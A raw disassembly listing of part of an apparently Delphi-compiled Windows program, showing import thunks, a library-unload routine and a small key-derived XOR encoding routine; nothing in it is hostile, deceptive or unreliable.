; Attributes: thunk
sub_400064C8 proc near ; CODE XREF: sub_40014250+AE�p
jmp ds:dword_40024614
sub_400064C8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400064D0 proc near ; CODE XREF: sub_400141BC+11�p
jmp ds:dword_40024610
sub_400064D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400064D8 proc near ; CODE XREF: sub_40014250+7A�p
; sub_40014374+6C�p ...
jmp ds:dword_4002460C
sub_400064D8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400064E0 proc near ; CODE XREF: sub_4001452C+32�p
; sub_400146B4+2B�p
jmp ds:dword_40024608
sub_400064E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400064E8 proc near ; CODE XREF: sub_4001464C+32�p
jmp ds:dword_40024604
sub_400064E8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400064F0 proc near ; CODE XREF: sub_4000C710+22�p
; sub_4000C710+2B�p ...
jmp ds:dword_400245FC
sub_400064F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400064F8 proc near ; CODE XREF: sub_40007BB4+37�p
; sub_40007EBC+58�p ...
jmp ds:dword_400245F8
sub_400064F8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006500 proc near ; CODE XREF: .itext:40019475�p
jmp ds:dword_400245F4
sub_40006500 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006508 proc near ; CODE XREF: sub_4000C69C+2A�p
; sub_4000C69C+3A�p ...
jmp ds:dword_400245F0
sub_40006508 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006510 proc near ; CODE XREF: sub_400171BC+E7�p
; sub_400171BC+110�p
jmp ds:dword_400245EC
sub_40006510 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006518 proc near ; CODE XREF: sub_40012E54+23�p
; sub_40013448+11�p ...
jmp ds:dword_400245E8
sub_40006518 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006520 proc near ; CODE XREF: sub_40012AF4+F�p
; sub_40012C6C+16�p ...
jmp ds:dword_400245E4
sub_40006520 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006528 proc near ; CODE XREF: sub_4000AAF4+53�p
; sub_4000AAF4+7C�p
jmp ds:dword_400245E0
sub_40006528 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006530 proc near ; CODE XREF: sub_40016F88+46�p
jmp ds:dword_400245DC
sub_40006530 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006538 proc near ; CODE XREF: sub_40016F88+D�p
jmp ds:dword_400245D8
sub_40006538 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006540 proc near ; CODE XREF: sub_4000A81C+1F�p
jmp ds:dword_400245D4
sub_40006540 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006548 proc near ; CODE XREF: sub_40006758+28�p
jmp ds:dword_400245D0
sub_40006548 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006550 proc near ; CODE XREF: sub_40016F88+3D�p
jmp ds:dword_400245CC
sub_40006550 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006558 proc near ; CODE XREF: sub_4000BD44+10�p
jmp ds:dword_400245C8
sub_40006558 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006560 proc near ; CODE XREF: sub_4000C5B4+4�p
; sub_4000C5D0+13�p ...
jmp ds:dword_400245C4
sub_40006560 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006568 proc near ; CODE XREF: sub_40009414+7E�p
; sub_40009590+8C�p
jmp ds:dword_400245C0
sub_40006568 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006570 proc near ; CODE XREF: sub_400080E8+21�p
jmp ds:dword_400245BC
sub_40006570 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006578 proc near ; CODE XREF: .itext:400198D8�p
jmp ds:dword_400245B8
sub_40006578 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006580 proc near ; CODE XREF: sub_4000C410�p
jmp ds:dword_400245B4
sub_40006580 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006588 proc near ; CODE XREF: sub_400092B0+4�p
jmp ds:dword_400245B0
sub_40006588 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006590 proc near ; CODE XREF: sub_4000A868+1E�p
; sub_4000A8B4+13�p
jmp ds:dword_400245AC
sub_40006590 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006598 proc near ; CODE XREF: sub_4000ADE0+41�p
; sub_4000ADE0+5C�p ...
jmp ds:dword_400245A8
sub_40006598 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400065A0 proc near ; CODE XREF: sub_4000C4D8+6�p
; sub_4000D28C+9�p ...
jmp ds:dword_400245A4
sub_400065A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400065A8 proc near ; CODE XREF: sub_4000C4D8+17�p
; sub_4000D260+19�p ...
jmp ds:dword_400245A0
sub_400065A8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400065B0 proc near ; CODE XREF: sub_4000AF68+54�p
; sub_4000AF68+6F�p
jmp ds:dword_4002459C
sub_400065B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400065B8 proc near ; CODE XREF: .itext:4001942D�p
; .itext:4001949D�p
jmp ds:dword_40024598
sub_400065B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400065C0 proc near ; CODE XREF: sub_400171BC+55�p
jmp ds:dword_40024594
sub_400065C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400065C8 proc near ; CODE XREF: sub_40009414+78�p
; sub_40009590+86�p ...
jmp ds:dword_40024590
sub_400065C8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400065D0 proc near ; CODE XREF: sub_400179D4+5�p
; sub_400179D4+16�p ...
jmp ds:dword_4002458C
sub_400065D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400065D8 proc near ; CODE XREF: sub_4000B830+E�p
jmp ds:dword_40024588
sub_400065D8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400065E0 proc near ; CODE XREF: sub_400133D4+2F�p
; sub_4001394C+1F�p ...
jmp ds:dword_40024584
sub_400065E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400065E8 proc near ; CODE XREF: sub_40012AF4+5B�p
; sub_40012C6C+5D�p ...
jmp ds:dword_40024580
sub_400065E8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400065F0 proc near ; CODE XREF: sub_400173FC+3B�p
jmp ds:dword_4002457C
sub_400065F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400065F8 proc near ; CODE XREF: sub_40016F88+29�p
jmp ds:dword_40024578
sub_400065F8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006600 proc near ; CODE XREF: sub_40016F88+31�p
jmp ds:dword_40024574
sub_40006600 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006608 proc near
jmp ds:dword_40024570
sub_40006608 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006610 proc near ; CODE XREF: sub_400165F0+3B�p
; sub_400165F0+80�p
jmp ds:dword_4002456C
sub_40006610 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006618 proc near ; CODE XREF: sub_400171BC+12A�p
jmp ds:dword_40024568
sub_40006618 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006620 proc near ; CODE XREF: sub_4000C758+4�p
jmp ds:dword_40024564
sub_40006620 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006628 proc near ; CODE XREF: sub_4000C764+4�p
; sub_4000C770+4�p
jmp ds:dword_40024560
sub_40006628 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006630 proc near ; CODE XREF: sub_400171BC+F8�p
jmp ds:dword_4002455C
sub_40006630 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006638 proc near ; CODE XREF: sub_40016F88+1B�p
jmp ds:dword_40024558
sub_40006638 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006640 proc near ; CODE XREF: sub_400179D4+11�p
; sub_400179D4+22�p
jmp ds:dword_40024554
sub_40006640 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006648 proc near ; CODE XREF: sub_4000ADE0+1D�p
; sub_4000B488+6B�p
jmp ds:dword_40024550
sub_40006648 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006650 proc near ; CODE XREF: sub_4000C77C+8�p
; sub_4000C78C+8�p
jmp ds:dword_4002454C
sub_40006650 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006658 proc near ; CODE XREF: sub_400171BC+179�p
jmp ds:dword_40024548
sub_40006658 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006660 proc near ; CODE XREF: sub_4000AF68+5A�p
; sub_4000AF68+75�p ...
jmp ds:dword_40024544
sub_40006660 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006668 proc near ; CODE XREF: .itext:4001948E�p
jmp ds:dword_40024540
sub_40006668 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006670 proc near ; CODE XREF: sub_40015270+AB�p
jmp ds:dword_40024538
sub_40006670 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006678 proc near ; CODE XREF: sub_40014F8C+1D1�p
jmp ds:dword_40024534
sub_40006678 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006680 proc near ; CODE XREF: sub_4001567C+10B�p
jmp ds:dword_40024530
sub_40006680 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006688 proc near ; CODE XREF: sub_400151D0+63�p
jmp ds:dword_4002452C
sub_40006688 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006690 proc near ; CODE XREF: sub_40015840+6C�p
jmp ds:dword_40024528
sub_40006690 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006698 proc near ; CODE XREF: sub_40015C34+78�p
jmp ds:dword_40024524
sub_40006698 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400066A0 proc near ; CODE XREF: sub_40015430+19�p
jmp ds:dword_40024520
sub_400066A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400066A8 proc near ; CODE XREF: sub_4001567C+4A�p
jmp ds:dword_4002451C
sub_400066A8 endp
; ---------------------------------------------------------------------------
align 10h
db 0FFh
db 25h ; %
db 18h ; OFF32 SEGDEF [_idata,40024518]
db 45h ; E
db 2
db 40h ; @
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400066B8 proc near ; CODE XREF: sub_4001567C+69�p
; sub_4001567C+8D�p ...
jmp ds:dword_40024514
sub_400066B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400066C0 proc near ; CODE XREF: sub_40015918+26�p
jmp ds:dword_40024510
sub_400066C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400066C8 proc near ; CODE XREF: sub_40015380+1F�p
jmp ds:dword_4002450C
sub_400066C8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400066D0 proc near ; CODE XREF: sub_40015478+26�p
; sub_40015478+35�p ...
jmp ds:dword_40024508
sub_400066D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400066D8 proc near ; CODE XREF: sub_40015840+56�p
jmp ds:dword_40024504
sub_400066D8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400066E0 proc near ; CODE XREF: sub_40015600+41�p
; sub_40015600+67�p
jmp ds:dword_40024500
sub_400066E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400066E8 proc near ; CODE XREF: sub_40015600+4C�p
; sub_40015600+72�p
jmp ds:dword_400244FC
sub_400066E8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400066F0 proc near ; CODE XREF: sub_400155D0+29�p
jmp ds:dword_400244F8
sub_400066F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_400066F8 proc near ; CODE XREF: sub_400155A4+25�p
jmp ds:dword_400244F4
sub_400066F8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006700 proc near ; CODE XREF: sub_40015600+C�p
jmp ds:dword_400244F0
sub_40006700 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006708 proc near ; CODE XREF: sub_4000BB60+D�p
; sub_4000BB80+1�p
jmp ds:dword_400244E4
sub_40006708 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006710 proc near ; CODE XREF: sub_4000AF68+37�p
jmp ds:dword_400244E8
sub_40006710 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006718 proc near ; CODE XREF: sub_4001567C+2E�p
; sub_40015918+9�p
jmp ds:dword_400244E0
sub_40006718 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006720 proc near ; CODE XREF: sub_40014D5C+A�p
jmp ds:dword_400244DC
sub_40006720 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006728 proc near ; CODE XREF: sub_4000BDA0+75�p
; sub_4000BDA0+84�p
jmp ds:dword_400244D8
sub_40006728 endp
; ---------------------------------------------------------------------------
align 10h
db 0FFh
db 25h ; %
db 0D4h ; Ô OFF32 SEGDEF [_idata,400244D4]
db 44h ; D
db 2
db 40h ; @
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006738 proc near ; CODE XREF: sub_4000ADE0+F2�p
; sub_4000AF68+97�p
jmp ds:dword_400244D0
sub_40006738 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006740 proc near ; CODE XREF: sub_4000AF68+AD�p
jmp ds:dword_400244CC
sub_40006740 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40006748 proc near ; CODE XREF: sub_4001567C+F7�p
; sub_40015918+37�p
jmp ds:dword_400244C8
sub_40006748 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40006750 proc near ; CODE XREF: sub_40017A1C+E2�p
; sub_40017A1C+137�p
xchg eax, edx
call sub_40002DFC
retn
sub_40006750 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40006758 proc near ; DATA XREF: .text:40018330�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40006793
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4001E800
jnz short loc_40006785
cmp ds:dword_4001E804, 0
jz short loc_40006785
mov eax, ds:dword_4001E804
push eax
call sub_40006548 ; FreeLibrary
loc_40006785: ; CODE XREF: sub_40006758+17�j
; sub_40006758+20�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000679A
loc_40006792: ; CODE XREF: sub_40006758+40�j
retn
; ---------------------------------------------------------------------------
loc_40006793: ; DATA XREF: sub_40006758+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40006792
; ---------------------------------------------------------------------------
loc_4000679A: ; CODE XREF: sub_40006758:loc_40006792�j
; DATA XREF: sub_40006758+35�o
pop ebp
retn
sub_40006758 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000679C proc near ; CODE XREF: sub_4000684C+C4�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_40004D38
xor eax, eax
push ebp
push offset loc_40006838
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_10], 0
mov [ebp+var_C], 0
mov eax, [ebp+var_4]
test eax, eax
jz short loc_400067D6
sub eax, 4
mov eax, [eax]
loc_400067D6: ; CODE XREF: sub_4000679C+33�j
mov ecx, eax
test ecx, ecx
jle short loc_4000680F
mov ebx, 1
loc_400067E1: ; CODE XREF: sub_4000679C+5A�j
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax+ebx-1]
movzx eax, al
xor edx, edx
add [ebp+var_10], eax
adc [ebp+var_C], edx
inc ebx
dec ecx
jnz short loc_400067E1
jmp short loc_4000680F
; ---------------------------------------------------------------------------
loc_400067FA: ; CODE XREF: sub_4000679C+80�j
; sub_4000679C:loc_40006820�j
push 0
push 2
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
call sub_400056C0
mov [ebp+var_10], eax
mov [ebp+var_C], edx
loc_4000680F: ; CODE XREF: sub_4000679C+3E�j
; sub_4000679C+5C�j
cmp [ebp+var_C], 0
jnz short loc_40006820
cmp [ebp+var_10], 0FFh
ja short loc_400067FA
jmp short loc_40006822
; ---------------------------------------------------------------------------
loc_40006820: ; CODE XREF: sub_4000679C+77�j
jg short loc_400067FA
loc_40006822: ; CODE XREF: sub_4000679C+82�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000683F
loc_4000682F: ; CODE XREF: sub_4000679C+A1�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40006838: ; DATA XREF: sub_4000679C+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000682F
; ---------------------------------------------------------------------------
loc_4000683F: ; CODE XREF: sub_4000679C+9B�j
; DATA XREF: sub_4000679C+8E�o
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000679C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000684C proc near ; CODE XREF: sub_40006A2C+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
mov [ebp+var_4], edx
mov ebx, eax
mov eax, [ebp+var_4]
call sub_40004D38
xor eax, eax
push ebp
push offset loc_40006948
push dword ptr fs:[eax]
mov fs:[eax], esp
mov dword ptr [ebx], 0
mov dword ptr [ebx+4], 0
mov dword ptr [ebx+8], 0
mov dword ptr [ebx+0Ch], 0
mov dword ptr [ebx+10h], 0
mov dword ptr [ebx+14h], 0
cmp [ebp+arg_C], 0
jnz short loc_400068A3
cmp [ebp+arg_8], 1
jnb short loc_400068B3
jmp short loc_400068A5
; ---------------------------------------------------------------------------
loc_400068A3: ; CODE XREF: sub_4000684C+4D�j
jge short loc_400068B3
loc_400068A5: ; CODE XREF: sub_4000684C+55�j
mov [ebp+arg_8], 1
mov [ebp+arg_C], 0
loc_400068B3: ; CODE XREF: sub_4000684C+53�j
; sub_4000684C:loc_400068A3�j
cmp [ebp+arg_C], 0
jnz short loc_400068C1
cmp [ebp+arg_8], 64h
jbe short loc_400068D1
jmp short loc_400068C3
; ---------------------------------------------------------------------------
loc_400068C1: ; CODE XREF: sub_4000684C+6B�j
jle short loc_400068D1
loc_400068C3: ; CODE XREF: sub_4000684C+73�j
mov [ebp+arg_8], 63h
mov [ebp+arg_C], 0
loc_400068D1: ; CODE XREF: sub_4000684C+71�j
; sub_4000684C:loc_400068C1�j
cmp [ebp+arg_4], 0
jnz short loc_400068DF
cmp [ebp+arg_0], 1
jnb short loc_400068EF
jmp short loc_400068E1
; ---------------------------------------------------------------------------
loc_400068DF: ; CODE XREF: sub_4000684C+89�j
jge short loc_400068EF
loc_400068E1: ; CODE XREF: sub_4000684C+91�j
mov [ebp+arg_0], 2
mov [ebp+arg_4], 0
loc_400068EF: ; CODE XREF: sub_4000684C+8F�j
; sub_4000684C:loc_400068DF�j
cmp [ebp+arg_4], 0
jnz short loc_400068FD
cmp [ebp+arg_0], 64h
jbe short loc_4000690D
jmp short loc_400068FF
; ---------------------------------------------------------------------------
loc_400068FD: ; CODE XREF: sub_4000684C+A7�j
jle short loc_4000690D
loc_400068FF: ; CODE XREF: sub_4000684C+AF�j
mov [ebp+arg_0], 64h
mov [ebp+arg_4], 0
loc_4000690D: ; CODE XREF: sub_4000684C+AD�j
; sub_4000684C:loc_400068FD�j
mov eax, [ebp+var_4]
call sub_4000679C
mov [ebx], eax
mov [ebx+4], edx
mov eax, [ebp+arg_8]
mov [ebx+8], eax
mov eax, [ebp+arg_C]
mov [ebx+0Ch], eax
mov eax, [ebp+arg_0]
mov [ebx+10h], eax
mov eax, [ebp+arg_4]
mov [ebx+14h], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000694F
loc_4000693F: ; CODE XREF: sub_4000684C+101�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40006948: ; DATA XREF: sub_4000684C+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000693F
; ---------------------------------------------------------------------------
loc_4000694F: ; CODE XREF: sub_4000684C+FB�j
; DATA XREF: sub_4000684C+EE�o
pop ebx
pop ecx
pop ebp
retn 10h
sub_4000684C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40006958 proc near ; CODE XREF: sub_40006A2C+60�p
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov esi, eax
lea edi, [ebp+var_20]
push ecx
mov ecx, 6
rep movsd
pop ecx
mov [ebp+var_8], ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
call sub_40004D38
xor eax, eax
push ebp
push offset loc_40006A1C
push dword ptr fs:[eax]
mov fs:[eax], esp
mov esi, [ebp+var_4]
mov eax, esi
test eax, eax
jz short loc_40006999
sub eax, 4
mov eax, [eax]
loc_40006999: ; CODE XREF: sub_40006958+3A�j
mov edx, [ebp+var_8]
xchg eax, edx
call sub_40004F74
mov ebx, [ebp+var_18]
mov eax, esi
test eax, eax
jz short loc_400069B0
sub eax, 4
mov eax, [eax]
loc_400069B0: ; CODE XREF: sub_40006958+51�j
mov edi, eax
test edi, edi
jle short loc_40006A06
mov esi, 1
loc_400069BB: ; CODE XREF: sub_40006958+AC�j
mov eax, ebx
cdq
cmp edx, [ebp+var_C]
jnz short loc_400069CA
cmp eax, [ebp+var_10]
jbe short loc_400069CF
jmp short loc_400069CC
; ---------------------------------------------------------------------------
loc_400069CA: ; CODE XREF: sub_40006958+69�j
jle short loc_400069CF
loc_400069CC: ; CODE XREF: sub_40006958+70�j
mov ebx, [ebp+var_18]
loc_400069CF: ; CODE XREF: sub_40006958+6E�j
; sub_40006958:loc_400069CA�j
mov eax, [ebp+var_8]
call sub_40004DA0
lea eax, [eax+esi-1]
push eax
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax+esi-1]
movzx eax, al
xor edx, edx
push edx
push eax
mov eax, ebx
cdq
add eax, [ebp+var_20]
adc edx, [ebp+var_1C]
xor eax, [esp+44h+var_44]
xor edx, [esp+44h+var_40]
add esp, 8
pop edx
mov [edx], al
inc ebx
inc esi
dec edi
jnz short loc_400069BB
loc_40006A06: ; CODE XREF: sub_40006958+5C�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40006A23
loc_40006A13: ; CODE XREF: sub_40006958+C9�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40006A1C: ; DATA XREF: sub_40006958+28�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40006A13
; ---------------------------------------------------------------------------
loc_40006A23: ; CODE XREF: sub_40006958+C3�j
; DATA XREF: sub_40006958+B6�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40006958 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40006A2C proc near ; CODE XREF: sub_40017374+4F�p
; .itext:40019618�p ...
var_20 = byte ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
mov ebx, ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_40004D38
mov eax, [ebp+var_8]
call sub_40004D38
xor eax, eax
push ebp
push offset loc_40006AAC
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
test eax, eax
jz short loc_40006A65
sub eax, 4
mov eax, [eax]
loc_40006A65: ; CODE XREF: sub_40006A2C+32�j
mov edx, ebx
xchg eax, edx
call sub_40004F74
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_20]
mov edx, [ebp+var_8]
call sub_4000684C
mov ecx, ebx
mov edx, [ebp+var_4]
lea eax, [ebp+var_20]
call sub_40006958
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40006AB3
loc_40006A9E: ; CODE XREF: sub_40006A2C+85�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_40006AAC: ; DATA XREF: sub_40006A2C+22�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40006A9E
; ---------------------------------------------------------------------------
loc_40006AB3: ; CODE XREF: sub_40006A2C+7F�j
; DATA XREF: sub_40006A2C+6D�o
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_40006A2C endp
; ---------------------------------------------------------------------------
align 4
off_40006ABC dd offset dword_40006AC0 ; DATA XREF: sub_40016280+17�r
; sub_40016280+31F�r ...
dword_40006AC0 dd 61740C0Eh, 43584567h, 4E495045h, 204F46h, 30000h
